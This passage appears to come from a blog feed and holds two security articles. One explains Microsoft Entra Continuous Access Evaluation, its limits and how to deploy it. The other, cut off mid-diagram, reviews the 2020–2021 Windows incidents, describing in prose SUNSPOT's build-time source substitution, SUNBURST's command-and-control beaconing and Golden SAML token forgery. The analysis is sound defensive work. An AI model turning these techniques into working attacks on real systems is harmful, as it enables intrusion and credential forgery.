Complementary, not competitive. The threat model for CAE is stale authorization: the authorization decision at sign-in is no longer accurate, because the user has been disabled, their password has been reset, their risk score has changed, or their network location has shifted. The threat model for proof-of-possession is stolen tokens: an attacker holding a bearer token that was legitimately issued to a different party.

RFC 9449, OAuth 2.0 Demonstrating Proof of Possession (DPoP), published September 2023 by Daniel Fett and collaborators [@rfc-9449-dpop], binds an access token to a client-held key pair: a DPoP-bound token can only be replayed by an attacker who also stole the private key. RFC 8705, OAuth 2.0 Mutual-TLS Client Authentication and Certificate-Bound Access Tokens, published February 2020 by Brian Campbell and collaborators [@rfc-8705-mtls], does the same thing using mTLS certificates. Both are sender-constrained-token mechanisms; both close the bearer-token-replay attack surface.

CAE does not address token theft. A stolen CAE-aware token is still usable by the attacker until the IdP or RP becomes aware of the compromise. A DPoP-bound CAE-aware token closes both gaps: the attacker cannot replay it, and even if they could, the channel can revoke it within minutes. The correct deployment pattern is to combine CAE with DPoP or mTLS-binding where the application threat model warrants both.

CAE versus BeyondCorp-style identity-aware proxies

Different architectural layer. Identity-aware proxies (Google IAP, Cloudflare Access, AWS Verified Access) sit in front of the resource server and enforce policy at the proxy. They have full visibility into per-request state and can do instant revocation by terminating the connection at the proxy when policy changes. This is correct for proxy-fronted workloads but does not scale to the long tail of API surfaces that cannot or will not sit behind a proxy. CAE pushes the enforcement into the resource server itself, which is what lets it work for native cloud APIs and federated SaaS where the proxy model would not.

A note on PRT theft

CAE does not address attacks at the Primary Refresh Token (PRT) layer. The PRT is a long-lived refresh credential Windows uses to mint access tokens silently from a logged-in session. A stolen PRT can mint CAE-aware access tokens that are, from Entra's perspective, legitimately issued -- the attacker holds a credential the IdP still recognizes. CAE will only catch this if the user is revoked, the password is reset, or one of the other critical events fires after the PRT theft. The Pass-the-PRT attack class therefore bypasses CAE entirely; defenses for that layer are out of scope here and are a separate engineering problem.

Mapping the design space

The table is the cleanest way to see who competes with whom and who composes with whom.

Approach	Solves	Composes with CAE	Competes with CAE
OpenID SSF/CAEP 1.0	Cross-vendor revocation	Yes (CAE is a Microsoft implementation of the same pattern)	No
RFC 7662 introspection	Opaque-token revocation at modest scale	Parallel path	At hyperscale only
DPoP (RFC 9449)	Sender-constrained tokens	Yes (compose for full coverage)	No
mTLS-bound tokens (RFC 8705)	Sender-constrained tokens	Yes (compose for full coverage)	No
Identity-aware proxy	Per-request policy at the proxy edge	Composes for proxy-fronted workloads	Different layer
Short access-token lifetime	Reduces revocation window mechanically	Falls back when CAE not available	Yes, and loses on the trade

The reader who came to this article expecting a binary contest -- "which one wins?" -- has the wrong frame. The actual answer is that CAE is one move in a layered defense, and most production deployments will end up composing it with DPoP or mTLS for token binding, falling back to short lifetimes for non-CAE clients, and continuing to use introspection for opaque-token internal APIs.

That handles deployment. But every architecture has limits. The reader has spent six sections climbing; the next section is the humility beat where the descent begins.

8. Theoretical Limits: What CAE Cannot Do

Every architecture has a floor. The reader has spent six sections climbing; this is where the limits show up -- not as vendor laziness, but as physics, scale, and trust topology.

Limit 1: cannot revoke a token already in flight

Once a request has been accepted and is being served by the resource provider, CAE cannot reach into the RP's execution thread and abort it. The revocation applies to the next request. A long-running operation -- a bulk Outlook export, a large SharePoint upload -- that began at 10:23:00 may complete normally even if the user is disabled at 10:23:01. The revocation takes effect the next time the client presents the token [@ms-cae-concept]. For most use cases the in-flight window is sub-second and the consequence is negligible; for long-running data egress, it matters.

Limit 2: cannot beat the 15-minute critical-event SLA for most events

Microsoft's published SLA is "up to 15 minutes" for critical-event propagation [@ms-cae-concept]. Only IP-location enforcement is instant. The 15-minute number is not a fundamental limit; it is engineering economics at hyperscale. Fanning out an event to every CAE-aware RP for every potentially affected subject across Microsoft 365's global infrastructure is what produces the budget. Smaller-scale deployments demonstrate much better numbers: TigerIdentity's commercial deployment self-reports sub-second end-to-end revocation in a tuned CAEP receiver configuration [@tigeridentity-caep-explained]. The architecture allows sub-second; Microsoft's particular deployment chooses 15 minutes because the alternative at its fan-out scale is prohibitively expensive.

The strict physical floor sits below even the tuned implementations. An RP cannot enforce a revocation it has not yet learned about. The one-way network latency $L$ between IdP and RP sets the absolute minimum: with a transcontinental $L \approx 70,\text{ms}$, no push protocol can revoke faster than that, and pull protocols are necessarily worse. In practice, queuing, scheduling, and event-fanout dominate $L$ at scale -- but the floor remains.

Key idea: The 15-minute SLA is not a fundamental limit; it is engineering economics at hyperscale. Sub-second is feasible at smaller fan-outs, and is the direction of travel as receiver implementations improve and as Microsoft's own event-distribution infrastructure ages well. But the strict physical floor is the network latency between IdP and RP; no cooperative protocol can do better than that.

Limit 3: cannot cover non-CAE-aware clients or resource providers

CAE is a cooperative protocol. Both the client (via the xms_cc=cp1 capability declaration) and the resource provider (via implementing the participation contract) must be CAE-aware [@ms-cae-app-resilience]. A non-CAE client receives a default 1-hour token and never sees a claims challenge; it relies on standard expiry. A non-CAE RP silently falls back to standard token expiry as well; the IdP's events have no consumer. The CAE-aware portion of the estate enjoys the new contract; the rest carries the old security debt unchanged.

This is why audit posture matters. A tenant administrator who wants to argue that revocation latency for their workforce is "under 15 minutes" must be able to demonstrate that the client and RP combinations the workforce actually uses are CAE-aware. Microsoft's compatibility tables [@ms-cae-concept] document several Office-web-app and OneDrive-Win32-versus-SharePoint combinations as Not Supported or Partially supported; those gaps are part of the tenant's effective revocation profile, not someone else's problem.

Limit 4: cannot help if the resource provider itself is compromised

Revocation state lives at the RP. A compromised RP can simply ignore revocation events: keep serving requests against tokens Entra has signaled are invalid; misreport its own subscription state; drop events on the floor. CAE is a cooperative protocol between trustworthy parties. It is not a defense against an RP that has been pwned. The OpenID SSF specification addresses this implicitly by defining receiver requirements (verification events, stream-control endpoints, signature verification on SETs), but no receiver requirement can compel a compromised receiver to obey the protocol.

The threat model implication: an attacker who has compromised an RP does not need to bypass CAE. They simply do not implement it from the inside, and the protocol's design has no remedy. RP integrity is a prerequisite, not a guarantee.

Limit 5: cannot revoke a stolen PRT before it mints a new access token

As noted in Section 7, the Primary Refresh Token sits outside CAE's scope. A stolen PRT mints new CAE-aware access tokens that Entra treats as legitimately issued, because from Entra's perspective they are legitimately issued -- the attacker is presenting a credential the IdP recognizes. CAE catches PRT theft only when one of the five critical events fires after the theft. If the attacker exfiltrates a PRT, refreshes a token, and immediately uses it, the access token is valid and the revocation channel has nothing to revoke.

The SharePoint Online user-risk-event caveat is a useful concrete example of the per-feature limit pattern. Even within the four CAE-consuming RPs, feature support is not uniform; you cannot reason about CAE as a single boolean property at the workload level. Every event you care about must be checked against the specific RP that will enforce it [@ms-cae-concept].

The bounded design space

Put together, the five limits draw the perimeter of what CAE can do. It cannot stop in-flight requests. It cannot beat network latency at the strict floor or 15 minutes at Microsoft's chosen operating point. It cannot help non-participating clients or RPs. It cannot fix a compromised RP. It cannot revoke PRT-layer credentials before they mint new tokens. The honest summary is that the design space is bounded -- the reader who internalizes the five limits has a calibrated sense of what is fundamentally possible, and can stop expecting CAE to be a single fix for revocation in all situations.

The limits also map the open frontier. If those are the structural constraints, what are the OpenID Foundation and the SaaS long tail working on in 2026?

9. Open Problems (2026)

Final Specifications are necessary but not sufficient. CAEP 1.0, SSF 1.0, and RISC 1.0 were approved on September 2, 2025 [@openid-three-final-specs]. The question for 2026 is what adoption and extension look like. Five live problems.

1. Third-party SaaS receiver-adoption depth

The Final Specifications give every SaaS vendor a clean target to build against. The question is whether they will. Google Workspace shipped its SSF receiver in Closed Beta, supporting only the session-revoked CAEP event at launch [@google-workspace-ssf-api]. That is one event out of CAEP 1.0's eight. The SaaS long tail -- Workday, ServiceNow, GitHub Enterprise, Atlassian, Salesforce -- has not, as of the Final Specification's first anniversary, shipped public receivers.

For the "fired employee with N SaaS apps" scenario to be fully solved, every SaaS app in the user's bundle has to be a CAEP receiver subscribed to events from the enterprise IdP. The architecture is in place; the integration work is per-vendor and per-customer. This is the largest single determinant of CAE's real-world value over the next several years.

Note: The Microsoft 365 estate enjoys near-complete CAE coverage because Microsoft built both the IdP and the resource providers. The cross-vendor story is fundamentally a coordination problem: every receiver has to be built, deployed, and configured to subscribe to events from every transmitter the enterprise uses. SSF 1.0 makes the integration tractable; it does not make the work disappear. Watch receiver coverage in 2026-2028 as the leading indicator of CAE's industry-wide impact.

2. CAE for non-human and agent identities

CAEP subject identifiers assume user-shaped or device-shaped subjects [@openid-caep-1_0]. Workload identities, service principals, and emerging AI-agent identities sit outside the model as currently profiled. An agent acting on behalf of a user, with its own identity and its own session, is not yet covered by a Final-Specification profile. The Microsoft Entra Conditional Access for Agent Identities workstream is a documented Microsoft Learn surface as of 2026 [@ms-conditional-access-agent-id] and is one of the workstreams that will eventually produce a CAEP profile for non-human subjects, but as of mid-2026 the cross-vendor standardization gap is open.

3. Cross-IdP federation of SSF streams

When tenant A federates to tenant B, the event-flow path crosses a trust boundary the current Final Specifications do not explicitly profile. If a user is disabled in tenant A's IdP, how does the revocation event reach the resource providers downstream in tenant B? The pieces -- transmitter, receiver, SET envelope, signed events -- are all in place; what is missing is the canonical profile for cross-IdP federation of SSF streams. This is a 2026-2027 OpenID Foundation workstream rather than a Final-Specification gap.

4. Bidirectional signal sharing

Today's CAE and CAEP deployments are largely IdP-as-transmitter, RP-as-receiver. The full vision is bidirectional: an RP that detects anomalous behavior (unusual access patterns, suspected automation, post-authentication risk signals) should be able to transmit those signals back to the IdP, which can then incorporate them into the next authorization decision. SGNL and similar vendors are building toward this model. The Final Specifications support bidirectional flow at the protocol level; the policy and operational pieces -- who trusts whom, what events flow which way, how an IdP weighs signals from an RP -- are still being worked out.

5. Reason-code convergence between CAEP and RISC

CAEP 1.0 and RISC 1.0 cover overlapping ground around credential mutation. CAEP defines a credential-change event; RISC defines account-credential-change-required [@openid-caep-1_0; @openid-sharedsignals-wg]. Implementers must choose, and vendor extensions proliferate where the spec leaves room. Reason-code convergence between the two profiles is incomplete; some receivers will subscribe to both streams to be safe, others will pick one and hope upstream transmitters agree. Over time the WG will likely consolidate; for 2026, the practical guidance is to support both event vocabularies in receiver code.

The first interoperability event whose tested text was the Final-Specification version of SSF took place at Authenticate 2025 in San Diego, October 13-15, 2025, hosted by the FIDO Alliance and coordinated by the OpenID Foundation Shared Signals Working Group [@openid-authenticate-2025-interop]. The event required that all participants with an SSF Transmitter pass the OpenID Foundation's free, open-source conformance tests. This was the fourth in a series of Gartner-IAM and Authenticate interops since March 2024, and the first conducted after SSF 1.0 was approved Final on September 2, 2025. The list of vendor participants has grown at each event; cross-vendor receiver coverage is the metric to watch.

Given all this -- the architecture, the limits, the open frontier -- what should you actually do this week in your tenant and your code?

10. Turning CAE On in Your Tenant and Your Code

Three audiences, three checklists. Each section is what an engineer in that role needs to confirm or change to make CAE work in their environment.

For the tenant administrator

CAE has been auto-enabled by default for new Microsoft Entra tenants since the January 2022 GA [@simons-2022-01-ga-rss]. Tenants created before then may need to verify enablement in Conditional Access -> Session controls -> Customize continuous access evaluation. The relevant signals to check:

CAE enablement state. Confirm that the tenant-wide CAE policy is set to Enabled rather than Disabled or Strict location.
Per-policy disable flags. Some legacy CA policies carry per-policy CAE overrides. Audit any that explicitly disable CAE; the right default is to honor it.
Strict location enforcement migration. Tenants with pre-GA "strict location enforcement" preview settings should verify that the policy has migrated to the current GA configuration model documented in Microsoft Learn [@ms-strict-location-enforcement].
Audit log baselines. Sign-in logs surface signInEventTypes with CAE-related entries; refresh-token issuance events and revocation events appear in the Entra ID audit log. Build a baseline before changing policies so you can detect drift.

For the MSAL client developer

The client side has three things to confirm and one thing to test:

MSAL version. Use a current MSAL release on your client platform: 4.x for MSAL.NET and MSAL.js; the appropriate current line for MSAL Python, MSAL Java, MSAL Android, and MSAL for iOS/macOS, per each SDK's own release stream. Microsoft Learn's Use Continuous Access Evaluation enabled APIs page enumerates the per-SDK guidance [@ms-cae-app-resilience]. Earlier major-version lines do not handle the claims challenge transparently.
Capability declaration. The app registration must declare xms_cc with value ["cp1"] (lowercase is the canonical token-claim form; uppercase "CP1" also works because negotiation is case-insensitive). This is the wire-level signal to Entra that the client can handle a CAE-aware token and the claims challenge that comes with it.
Claims-challenge handling. MSAL helpers do this transparently in current SDK versions, but custom HTTP pipelines that bypass MSAL must implement the WWW-Authenticate: Bearer error="insufficient_claims" response handler manually. Decode the claims parameter (base64url), pass it to AcquireTokenInteractive or the equivalent, retry the original request with the new token.
End-to-end test. Trigger an admin password reset against a test user in a non-production tenant and verify that the next API call from a signed-in MSAL session surfaces the claims challenge and recovers cleanly. This is the single most useful confidence test; it exercises every layer of the protocol in one round trip.

{` // Illustrative: inspect an MSAL JS token-cache entry for the xms_cc capability // marker. In real apps, MSAL handles capability negotiation; this is for // educational inspection only.

// A real-shape AccessTokenEntity from MSAL JS cache const tokenEntity = { homeAccountId: 'abc.def-tenant', environment: 'login.microsoftonline.com', credentialType: 'AccessToken', clientId: '11111111-2222-3333-4444-555555555555', tenantId: 'tenant-id', target: 'User.Read Mail.Read', // expiresOn is up to ~28 hours after cachedAt for CAE-aware sessions cachedAt: '1748534400', expiresOn: '1748635200', // 28h later extendedExpiresOn: '1748635200', // Capability declaration the app advertised at acquisition time requestedClaims: { xms_cc: ['cp1'] } };

const ttlSeconds = parseInt(tokenEntity.expiresOn) - parseInt(tokenEntity.cachedAt); const ttlHours = ttlSeconds / 3600; const isCaeAware = tokenEntity.requestedClaims && tokenEntity.requestedClaims.xms_cc && tokenEntity.requestedClaims.xms_cc .some(c => c.toLowerCase() === 'cp1');

console.log('TTL hours:', ttlHours.toFixed(1)); console.log('CAE-aware:', isCaeAware); // TTL hours: 28.0 // CAE-aware: true // A TTL above ~1 hour with xms_cc cp1 is a strong indicator the session is // CAE-aware and Entra issued an extended-lifetime token. `}

For the custom-API author

This is the hardest path. To make a custom protected API a CAE-aware resource provider today, the first-party Microsoft pathway is not publicly available -- the CAE participation contract for the M365 productivity workloads is internal to Microsoft. The community-canonical implementation pattern is Damien Bowden's damienbod/AspNetCoreMeIDCAE reference repository on GitHub [@damienbod-aspnetcoremeidcae], with an accompanying blog post walkthrough [@damienbod-blog-2022-04]. The repository (initial version April 3, 2022; updated through .NET 10 in late 2025) demonstrates:

The xms_cc=cp1 capability declaration on both the client and the API app registrations.
The Microsoft.Identity.Web claims-challenge handling on the API side.
The Razor Page client flow that catches a 401 with the challenge header and re-acquires the token.

For a fully standards-track pathway, the same custom API can be built as an OpenID SSF receiver consuming CAEP events from any SSF-compliant transmitter, using the RFC 8417 SET envelope over the RFC 8935 push transport [@rfc-8417; @rfc-8935]. Production-grade SSF receiver code is now available in commercial CAEP Hub products (SGNL, TigerIdentity) and a growing set of open-source libraries.

Note: CAE itself does not require add-on licensing for the basic critical-event evaluation across Microsoft 365 -- it is part of the Entra ID baseline for new tenants. The Microsoft Entra ID Protection feed that drives high user risk detected events, however, requires Microsoft Entra ID P2 (or an equivalent SKU that includes Identity Protection). Confirm current licensing terms in the Microsoft licensing documentation before making procurement decisions; the lower SKUs cover four of the five critical events but not the risk-based one [@ms-cae-concept].

Observability

Sign-in logs and audit logs are where CAE behavior shows up. Look for:

Sign-in logs: filter by signInEventTypes containing CAE-related entries. CAE-aware sign-ins have a different telemetry shape than non-CAE sign-ins.
Token-issuance events: refresh-token issuance against CAE-aware app registrations should show the extended lifetime.
Audit log revocation entries: administrator revocation actions and Identity-Protection-driven revocations appear here; cross-correlate with the resource-provider-side telemetry to validate end-to-end propagation.

Use Microsoft Graph PowerShell to enumerate the tenant's CAE configuration and then trigger a synthetic test: 1) read `Get-MgIdentityConditionalAccessPolicy` to verify the relevant CA policies have CAE enabled in their `SessionControls.ContinuousAccessEvaluation` block; 2) create a test user, sign them in via Outlook on the Web; 3) reset their password via `Update-MgUser`; 4) observe in the audit log that the password reset propagates to a CAE event, and verify in Outlook on the Web that the next refresh surfaces a re-authentication prompt within the 15-minute SLA. This is the simplest end-to-end confidence test that does not require modifying any production resource.

Defaults are good

The most common engineering recommendation here is to leave the defaults alone. CAE on, default tenant settings, current MSAL clients, xms_cc=cp1 on every new app registration. The configuration surface area is small precisely because the design is right: there are not many knobs to turn. The work is in confirming that the client and RP combinations your users actually exercise are CAE-aware, and in monitoring the audit logs to catch drift.

That is what to do. The last section is what to remember -- the misconceptions every team carries into a CAE conversation, and the answers that close them.

11. FAQ and Coda

No. The published SLA is up to 15 minutes for the five critical events; only IP-location enforcement is instant. See Section 6 for the mechanical reason for the asymmetry and Section 8 Limit 2 for why 15 minutes is engineering economics rather than a fundamental limit [@ms-cae-concept]. No. CAE addresses *stale authorization* (the original authorization decision is no longer correct), not *stolen tokens* (an attacker is presenting a token that was legitimately issued to someone else). For token theft, use a sender-constrained-token construction: DPoP per RFC 9449 [@rfc-9449-dpop] or mTLS-bound tokens per RFC 8705 [@rfc-8705-mtls]. Both compose cleanly with CAE; a DPoP-bound CAE-aware token is the strongest commonly-deployed combination today, closing both the replay attack surface and the stale-authorization gap. No. SSF 1.0, CAEP 1.0, and RISC 1.0 were approved as OpenID Foundation Final Specifications on September 2, 2025 -- see Section 4 for the standards-stack treatment [@openid-three-final-specs]. No. MDE and Intune are signal sources into Conditional Access, not CAE-consuming resource providers; see the Section 6 Common-misconception callout for the full distinction and the CAE-aware RP set [@ms-cae-concept]. *Not when the resource provider is CAE-aware.* The token lifetime stops carrying the revocation weight; the channel does. A CAE-aware RP can revoke a 28-hour token within 15 minutes of a critical event, which is a strictly better revocation profile than a 1-hour token with no channel (revocable only at the 1-hour expiry boundary in the worst case) [@ms-cae-concept]. *Yes*, however, when the RP is *not* CAE-aware: the token then carries its full lifetime as the revocation window, and longer is worse. The architectural rule: only issue extended-lifetime tokens to clients whose RPs are CAE-aware -- which is exactly what the `xms_cc=cp1` capability negotiation enforces [@ms-cae-app-resilience]. No. CAE is specific to OAuth 2.0 and OpenID Connect access tokens. SAML assertions have their own lifetime and replay-protection model and are not in scope for the CAE participation contract or for the OpenID SSF/CAEP profiles [@ms-cae-concept; @openid-caep-1_0]. If you are still operating SAML-fronted workloads, the analogous design problem (revocation between sign-in and assertion expiry) is solved differently and is largely a per-product implementation question rather than a standards story.

Coda: the bargain

The OAuth 2.0 designers in 2012 took a deliberate trade: short-lived self-contained tokens were the price they paid to escape the WAM bottleneck. The trade was correct for the web they were designing for. It became wrong the moment enterprises ran compliance-bound SaaS at scale on top of those tokens. Three obvious patches were tried -- the /revoke endpoint, the /introspect endpoint, the short-lifetime experiment -- and each failed for a distinct reason: the wrong party initiates revocation; the AS becomes a per-request critical path; expiry as a blunt instrument creates load and reliability problems while still leaving a window.

What replaced them was an architecture that took two facts seriously. First, revocation has to be push from the IdP to the RP -- not pull from RP to AS, not client-initiated POST to /revoke. Second, expiry and revocation can be separated: once the channel handles revocation, expiry can be measured in days rather than minutes. The 15-minute critical-event SLA and the up-to-28-hour token lifetime are two halves of the same bargain. Microsoft Entra ships them together because they only work together; the OpenID Foundation has standardized the same pattern across vendors because the long tail of SaaS faces the same problem.

The architecture is settled; the adoption is in progress. The CAEP, SSF, and RISC Final Specifications give every SaaS vendor a tractable target. The Microsoft 365 estate is already covered. Cross-vendor receiver coverage is the metric that will decide how much of the 2026 enterprise identity surface actually inherits the bargain -- and that, more than any further protocol work, is the story to watch over the next several years.

The Thirteen Months That Made Zero Trust Unavoidable: The Windows Security Wars Part 5 (2020-2023)

noreply@paragmali.com (Parag Mali) — Wed, 27 May 2026 00:00:00 GMT

Four incidents in thirteen months -- SolarWinds (December 2020), ProxyLogon (March 2021), PrintNightmare (June-July 2021), and Log4Shell (December 2021) -- broke four assumptions the Windows blue team had quietly elevated to invariants: that signed vendor updates are trustworthy, that on-premises server fleets are bounded by the firewall, that legacy SYSTEM services on Domain Controllers are not on the attack surface, and that transitive dependencies are knowable. The architectural pivot was already on the shelf: NIST SP 800-207, *Zero Trust Architecture*, shipped in August 2020, four months before SolarWinds. The defensive primitives that operationalized it -- Microsoft Pluton, the Windows 11 hardware baseline, Conditional Access with Continuous Access Evaluation and the Primary Refresh Token, and the LSA Protection and Vulnerable Driver Blocklist defaults -- shipped at scale through 2022-2023. The trust roots are still not closed; Storm-0558 (July 2023) is the existence proof that the policy engine itself is a privileged plane. That is Part 6.

1. Eighteen Thousand Signatures, All Valid

On December 13, 2020 -- a Sunday -- Mandiant Threat Intelligence pushed a blog post to FireEye's website titled "Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor." The post named a single binary, SolarWinds.Orion.Core.BusinessLayer.dll, that had been digitally signed by SolarWinds' legitimate code-signing certificate and distributed through SolarWinds' own update server between February and June 2020 [@mandiant-sunburst]. Two days later, SolarWinds filed a Form 8-K with the U.S. Securities and Exchange Commission stating that the actual number of customers who installed the updates between March and June 2020 was fewer than 18,000 [@solarwinds-sec-edgar].

Two months after that, Microsoft President Brad Smith testified to the U.S. Senate Select Committee on Intelligence that the number of follow-on victims who had been targeted with further lateral movement -- via a token-forgery primitive against Active Directory Federation Services -- was fewer than 100 [@senate-intel-2021-02-23].

The architectural lesson is in the gap between those two numbers. Eighteen thousand endpoints validated the Authenticode signature on a binary [@ms-authenticode], executed it as trusted code, and did exactly what an endpoint protection product is specified to do: nothing, because the binary was signed by a vendor on the trusted publisher list. The attacker then chose roughly one hundred targets to pursue further. The signature was real. The build pipeline that produced the signature was compromised. Ken Thompson's 1983 Turing Award lecture "Reflections on Trusting Trust," published in Communications of the ACM in August 1984, had predicted this exact class thirty-six years earlier [@thompson-1984-acm, @thompson-nakamoto-reading]; in December 2020 the Windows industry collected the receipt.

This is the largest and most sophisticated attack the world has ever seen ... we have seen substantial evidence that points to the Russian foreign intelligence agency, and we have found no evidence that leads us anywhere else. -- Brad Smith, Microsoft President, U.S. Senate Select Committee on Intelligence, February 23, 2021 [@senate-intel-2021-02-23]

SolarWinds was the first of four incidents the Windows blue team did not have a vocabulary for. ProxyLogon arrived in March 2021 and broke the assumption that on-premises Exchange Server fleets were bounded by the corporate firewall. PrintNightmare arrived in June-July 2021 and broke the assumption that legacy services running as SYSTEM on Domain Controllers were not on the attack surface. Log4Shell arrived in December 2021 and broke the assumption that "what software is in my fleet" was an answerable question.

Four incidents. Thirteen months. Four assumptions that the prior decade had quietly elevated to invariants. If the signature was real and the build was compromised, then "protect the endpoint" was protecting the wrong thing. Where did the threat model go?

2. Why 2020 Was the Inflection Point

The four incidents did not happen because 2020 was uniquely insecure. They happened because the structural conditions had been gathering for a decade, and three of them converged that year.

The endpoint-protection era's high-water mark. By 2019, the operational consensus across Windows fleets was that endpoint-centric defense-in-depth had become tractable. Credential Guard (2015) isolated LSASS secrets in a virtualization-based enclave [@ms-credential-guard]. Windows Defender ATP (2016) streamed kernel-level telemetry to a security operations centre. BloodHound (2016) made the on-premises Active Directory graph queryable as attack paths rather than as object permissions [@bloodhound-specterops]. Device Guard and WDAC (2017) constrained kernel and userspace code identity. The threat model was the endpoint. The perimeter was the VPN. The build pipeline was the vendor's problem. The cloud identity layer was Conditional Access on a handful of policies. The blue team's frame of reference was finite and bounded.

Microsoft's 2021 Digital Defense Report framed the post-event detection posture honestly: the industry had become good at finding attackers after the fact, less good at stopping them at first execution [@mddr-2021-specific]. Detection and response as the load-bearing primitive is precisely the posture that SolarWinds invalidated -- because the binary that ran was the one the EDR was specified to trust.

The pandemic-era expansion of the attack surface. From March 2020 onward, remote work shifted authentication to cloud identity providers, exposed VPN and RDP gateways at unprecedented scale, and made internet-facing Exchange near-universal in the mid-market. None of this caused SolarWinds -- the SolarWinds build-pipeline access had begun in September 2019 -- but it reshaped which incidents had the most operational impact when they landed. An Exchange Server fleet that had been ten internal users behind a VPN in 2019 was a hundred external users on the public internet in 2021. ProxyLogon would have been a serious incident in 2019. In 2021 it was a federal emergency.

An attack in which an adversary alters software, hardware, or services *before* the legitimate vendor delivers them, so that the eventual victim trusts the malicious artifact by virtue of trusting the vendor's identity. The compromise can occur at the source (commit signing keys), the build (the compiler or build server), the distribution (the update channel), or the installation (the package manager). SUNBURST was a *build-pipeline* compromise: SolarWinds' source remained clean; the build server inserted SUNBURST code into the compiled artifact, then signed it with SolarWinds' legitimate code-signing certificate.

The state of supply-chain assurance circa 2020. SLSA, the framework that would later codify "what does it mean for a build to be trustworthy" [@google-slsa-2021-06-16, @slsa-v1-levels], did not yet exist; Google announced it in June 2021. Reproducible builds were a research aspiration on a handful of Linux distributions. CycloneDX [@cyclonedx-home] and SPDX [@spdx-home] existed as bill-of-materials specifications but had no federal mandate behind them. in-toto [@in-toto-home] was the only deployed cryptographic-attestation framework for build steps, and adoption was minimal. Executive Order 14028, which would make Software Bill of Materials provision a federal procurement requirement, was still six months away [@eo-14028]. The build pipeline was not threat-modeled as attacker territory because no one had a name for the territory yet.

The same 2020-2023 window also produced a parallel criminal-economy track this article does not walk operationally: the human-operated ransomware cluster of Conti, REvil, DarkSide, and BlackCat / ALPHV, and the supply-chain-adjacent ransomware incidents Colonial Pipeline (May 2021, DarkSide), JBS Foods (May 2021, REvil), and Kaseya VSA (July 2, 2021, REvil). Kaseya is the non-Microsoft supply-chain parallel to SolarWinds: compromise the MSP-tier remote-monitoring platform, downstream MSPs and their customers receive trojanized commands, an architectural class that is not Microsoft-specific [@kaseya-ic3-csa-pdf-substitute]. The canonical primaries are CISA / FBI / NSA / USSS Joint Advisory AA21-265A on Conti [@conti-aa21-265a-wayback], the July 6, 2021 CISA-FBI Kaseya guidance [@kaseya-ic3-csa-pdf-substitute], the April 2022 FBI Flash and CISA alert on BlackCat / ALPHV [@cisa-blackcat-alert-substitute], and the February 2022 US/UK/AU joint ransomware advisory AA22-040A [@cisa-aa22-040a]. Microsoft's canonical framing for "human-operated ransomware" lives in the Digital Defense Report 2022 Cybercrime chapter [@mddr-2022]; readers wanting the operational ransomware-economy treatment should start there.

Taken together, these three threads produced an industry in which the trust-anchor primitives (signed code, perimeter firewalls, default-enabled SYSTEM services, "what library are we using") had all been quietly elevated to invariants while the conditions that made them invariant were eroding. The four incidents are not four bugs; they are four exposures of those four assumptions. The next section walks each in turn.

3. The Four Incidents

3.1 SolarWinds / SUNBURST: Supply Chain at Silicon

Five days before Mandiant published the SUNBURST analysis, FireEye's CEO Kevin Mandia disclosed that "a highly sophisticated state-sponsored adversary" had stolen FireEye's internal Red Team tooling [@mandiant-fireeye-rt-tools]. The disclosure triggered an internal investigation that traced the access path through FireEye's own SolarWinds Orion deployment. By the time Mandiant pushed the December 13 blog, the chain was named, the affected DLL was identified, and the federal response was already moving: CISA's Emergency Directive 21-01 went out the same day, ordering every Federal Civilian Executive Branch agency to disconnect or power down SolarWinds Orion products [@cisa-ed-21-01].

The exploit chain. The SolarWinds build pipeline had been compromised since approximately September 2019, eight months before the trojanized builds reached customers [@solarwinds-orange-matter-sunburst]. Between February and June 2020, the SolarWinds release process produced four signed versions of Orion that contained additional code added during the build itself, after the source was clean but before the artifact was signed. The compromised builds embedded a backdoor Mandiant named SUNBURST inside SolarWinds.Orion.Core.BusinessLayer.dll [@mandiant-sunburst]. SUNBURST was deliberately quiet: it slept for up to two weeks after install, camouflaged its callback traffic as legitimate Orion telemetry, generated its command-and-control hostnames from a domain-generation algorithm rooted at avsvmcloud.com, and ignored any host whose environment matched the attacker's exclusion list (which included most security vendors and some forensic tooling). On selected targets, SUNBURST loaded a second-stage Cobalt Strike beacon named TEARDROP [@mandiant-sunburst] or its variant Raindrop [@symantec-raindrop-2021], and from there the attacker pursued domain compromise of the on-premises Active Directory.

SUNSPOT: the build-time injector. Mandiant's December 13 post named the SUNBURST artifact but did not yet describe how the trojanized DLL got into the build. On January 11, 2021, CrowdStrike Intelligence published an analysis of the injector itself, codenamed SUNSPOT, co-published with SolarWinds' own root-cause investigation update [@crowdstrike-sunspot, @solarwinds-orange-matter-sunburst]. SUNSPOT was a Windows binary present on the SolarWinds build server as taskhostsvc.exe. It monitored running processes for MsBuild.exe, walked the new process's environment to find the directory of the Orion Visual Studio solution, located the source file InventoryManager.cs, replaced its contents on disk with a SUNBURST-bearing version just before the C# compiler read the file, waited for the build to finish, then atomically restored the original file. Because the substitution happened in the narrow window between MsBuild reading the source and the compiler emitting the binary, the source repository at rest never showed evidence. The artifact on disk after the build looked exactly like the artifact a clean build would have produced -- except that the compiled bytes embedded SUNBURST.

The build-time injector CrowdStrike identified as the SolarWinds-side companion to SUNBURST [@crowdstrike-sunspot]. SUNSPOT is the operational realization at production scale of the threat model Ken Thompson described in 1984: the build process is the trust boundary, and an attacker who controls the build process produces an artifact whose signature is correct but whose semantics are not what the source code says.

The on-premises compromise was the means. The cloud pivot was the end. Once the attacker controlled the on-premises ADFS server's token-signing private key, the chain shifted to Golden SAML.

A token-forgery technique introduced by Shaked Reiner of CyberArk Labs in November 2017 [@reiner-2017-cyberark]. If an attacker obtains the token-signing private key of a SAML 2.0 identity provider (typically the on-premises Active Directory Federation Services token-signing certificate), the attacker can forge a SAMLResponse for any user, with any group memberships, valid for any duration. Service providers that trust the federation cannot distinguish forged tokens from legitimate ones. Reiner published a reference implementation called `shimit` alongside the disclosure [@cyberark-shimit-gh]. The naming is a deliberate parallel to Mimikatz's Golden Ticket against Kerberos. The first-stage backdoor that Mandiant identified inside `SolarWinds.Orion.Core.BusinessLayer.dll` in December 2020 [@mandiant-sunburst, @solarwinds-sec-edgar]. SUNBURST established initial command and control over HTTPS, blending into the volume of telemetry that legitimate Orion deployments generated. sequenceDiagram participant SUNSPOT as SUNSPOT on SolarWinds build server participant Build as SolarWinds MsBuild process participant Customer as Customer Orion Server participant C2 as avsvmcloud DGA C2 participant ADFS as On-prem ADFS participant M365 as Microsoft 365 SUNSPOT->>Build: Replace InventoryManager.cs at compile time Build->>Customer: Signed Orion update with SUNBURST DLL Customer->>Customer: Authenticode validates signature, executes Customer->>C2: HTTPS beacon 